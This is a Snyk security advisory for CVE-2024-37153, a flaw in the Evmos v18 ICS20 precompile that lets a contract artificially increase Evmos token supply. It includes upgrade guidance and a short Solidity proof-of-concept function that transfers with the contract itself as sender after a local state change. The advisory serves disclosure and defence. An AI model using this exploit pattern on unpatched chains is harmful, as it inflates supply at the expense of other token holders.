Session Fixation Affecting github.com/evmos/evmos/v18/precompiles/ics20 package, versions <18.1.0
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-GOLANG-GITHUBCOMEVMOSEVMOSV18PRECOMPILESICS20-7222574
- published9 Jun 2024
- disclosed6 Jun 2024
- creditVvaradinov
Introduced: 6 Jun 2024
CVE-2024-37153 (opens in a new tab)How to fix?
Upgrade github.com/evmos/evmos/v18/precompiles/ics20 to version 18.1.0 or higher.
Overview
Affected versions of this package are vulnerable to Session Fixation due to the improper handling of contract balances during interchain transactions involving a local state change and an ICS20 transfer. An attacker can exploit this flaw to artificially increase the supply of Evmos tokens by manipulating the sender parameter in the ICS20 transfer function. This is only exploitable if the contract address is used as the sender in an ICS20 transfer.
PoC
// This function does not reduce the contract balance correctly but liquid stakes correctly
function transfer(
string memory sourcePort,
string memory sourceChannel,
string memory denom,
uint256 amount,
string memory receiver,
string memory evmosReceiver
) external returns (uint64 nextSequence) {
counter += 1; # Only happens when there is a local state update together with an ICS20 Transfer
Height memory timeoutHeight = Height(100, 100);
string memory memo = buildLiquidStakeMemo(receiver, evmosReceiver);
return ICS20_CONTRACT.transfer(
sourcePort,
sourceChannel,
denom,
amount,
address(this), # this is the sender address which is the contract
receiver,
timeoutHeight,
0,
memo
);
}